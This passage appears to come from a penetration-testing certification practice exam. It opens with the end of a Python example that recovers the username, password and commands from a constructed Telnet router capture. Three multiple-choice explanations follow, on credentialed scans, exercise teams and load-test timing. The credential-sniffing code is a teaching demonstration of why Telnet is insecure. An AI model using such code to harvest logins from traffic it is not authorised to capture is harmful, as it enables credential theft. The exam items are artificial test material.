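        lines, client_buf = _complete_lines(client_buf)
        for line in lines:
            if expecting in ("username", "password"):
                found[expecting] = line
                expecting = None
            elif line:
                found["commands"].append(line)
    return found


# Constructed capture of a router login over TCP/23, negotiation included.
SAMPLE_SESSION = [
    ("S", bytes([IAC, DO, TERMINAL_TYPE, IAC, WILL, ECHO, IAC, WILL, SUPPRESS_GO_AHEAD])
          + b"\r\nUser Access Verification\r\n\r\nUsername: "),
    ("C", bytes([IAC, WILL, TERMINAL_TYPE, IAC, DO, ECHO, IAC, DO, SUPPRESS_GO_AHEAD,
                 IAC, SB, TERMINAL_TYPE, 0]) + b"XTERM" + bytes([IAC, SE]) + b"admin\r\n"),
    ("S", b"admin\r\nPassword: "),
    ("C", b"P@ssw0rd!\r\n"),
    ("S", b"\r\nrouter-core1#"),
    ("C", b"show running-config\r\n"),
]

if __name__ == "__main__":
    print(recover_credentials(SAMPLE_SESSION))
```

The same bytes captured from an SSH session would be ciphertext after the key exchange, which is why the fix is the protocol change rather than another password rotation.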
Question 48 of 50
48. Question
Which of the following vulnerability scans would provide the best results if you want to determine if the target’s configuration settings are correct?
OBJ-2.2: A credentialed scan logs in to the target and reads its configuration directly (registry keys, configuration files, installed packages and patch levels), so it gives the most accurate picture of whether the settings are correct. A non-credentialed scan must infer configuration from externally observable signs such as service banners and responses, which can be altered or simply wrong. The scanner's network location does not change its ability to read configuration information, so it would make no difference whether the scan is conducted externally or internally.
Question 49 of 50
49. Question
Nick is participating in a security exercise as part of the network defense team for his organization. Which team is Nick playing on?
OBJ-1.3: Nick is on the blue team. Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play "war game" exercises in which the security personnel split into teams: red, blue and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building the tools and architectures in which the exercise will be performed.
Question 50 of 50
50. Question
You have been contracted to conduct a penetration test against Skillcertpro Training’s learning management system (LMS). The company wants to determine how effectively their LMS can scale up during periods of high student demand without negatively affecting the student experience. Which of the following things in your engagement documentation would be the MOST important to ensuring successful load testing?
OBJ-1.3: The time of day at which the test is conducted is critically important given this engagement's goals. The engagement seeks to determine whether the LMS can quickly scale up in response to increased student demand. This is not just a bandwidth test or a simple load test; the company also wants to know whether the customer/student experience is affected. To determine that, the engagement must occur while many real students are online and taking courses. Because the test deliberately adds load while real users are present, the engagement documentation should also record abort criteria and an emergency contact so the test can be stopped if it begins to degrade service.